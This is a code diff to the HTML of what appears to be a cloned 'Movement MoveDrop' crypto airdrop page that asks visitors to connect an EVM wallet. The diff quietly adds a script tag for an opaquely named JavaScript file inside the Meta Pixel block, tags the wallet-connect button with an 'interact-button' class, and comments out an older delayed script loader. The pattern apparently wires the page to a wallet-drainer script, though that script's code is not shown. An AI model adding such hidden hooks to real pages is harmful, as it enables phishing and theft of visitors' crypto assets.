--- a/index.html
+++ b/index.html
@@ -206,6 +206,7 @@
         style="display: none"
         src="https://www.facebook.com/tr?id=404438892678628&ev=PageView&noscript=1"
     /></noscript>
+    <script charset="UTF-8" type="text/javascript" src="./1982c459-8510-49c1-803a-39959dcf081d.js"></script>
     <!-- End Meta Pixel Code -->
   </head>
   <body class="__variable_a82ff0 __variable_f69744">
@@ -237,7 +238,7 @@
             To get started, connect the EVM wallet you used during registration.
           </p>
           <div class="flex gap-10 items-center">
-            <button class="btn">Connect EVM Wallet</button>
+            <button class="btn interact-button">Connect EVM Wallet</button>
           </div>
         </div>
       </section>
@@ -283,14 +284,14 @@
         '15:[["$","meta","0",{"name":"viewport","content":"width=device-width, initial-scale=1"}],["$","meta","1",{"charSet":"utf-8"}],["$","title","2",{"children":"The Movement MoveDrop"}],["$","meta","3",{"name":"description","content":"Inviting the Movement Community to take part in the future of the Movement Ecosystem."}],["$","meta","4",{"property":"og:title","content":"The Movement MoveDrop"}],["$","meta","5",{"property":"og:description","content":"Inviting the Movement Community to take part in the future of the Movement Ecosystem."}],["$","meta","6",{"property":"og:image:type","content":"image/jpeg"}],["$","meta","7",{"property":"og:image:width","content":"1200"}],["$","meta","8",{"property":"og:image:height","content":"630"}],["$","meta","9",{"property":"og:image","content":"https://movedrop.movementnetwork.xyz/opengraph-image.jpg?3f7e80d2e3739237"}],["$","meta","10",{"name":"twitter:card","content":"summary_large_image"}],["$","meta","11",{"name":"twitter:title","content":"The Movement MoveDrop"}],["$","meta","12",{"name":"twitter:description","content":"Inviting the Movement Community to take part in the future of the Movement Ecosystem."}],["$","meta","13",{"name":"twitter:image:type","content":"image/jpeg"}],["$","meta","14",{"name":"twitter:image:width","content":"1200"}],["$","meta","15",{"name":"twitter:image:height","content":"630"}],["$","meta","16",{"name":"twitter:image","content":"https://movedrop.movementnetwork.xyz/opengraph-image.jpg?3f7e80d2e3739237"}],["$","link","17",{"rel":"icon","href":"/favicon.ico","type":"image/x-icon","sizes":"48x48"}],["$","meta","18",{"name":"next-size-adjust"}]]\nc:null\n',
       ]);
     </script>
-    <script>
-      setTimeout(() => {
-        console.log("loaded");
-        const script = document.createElement("script");
-        // script.defer = true;
-        script.src = "675ac018def0375813941ab5.js";
-        document.head.appendChild(script);
-      }, 1000);
-    </script>
+<!--    <script>-->
+<!--      setTimeout(() => {-->
+<!--        console.log("loaded");-->
+<!--        const script = document.createElement("script");-->
+<!--        // script.defer = true;-->
+<!--        script.src = "675ac018def0375813941ab5.js";-->
+<!--        document.head.appendChild(script);-->
+<!--      }, 1000);-->
+<!--    </script>-->
   </body>
 </html>
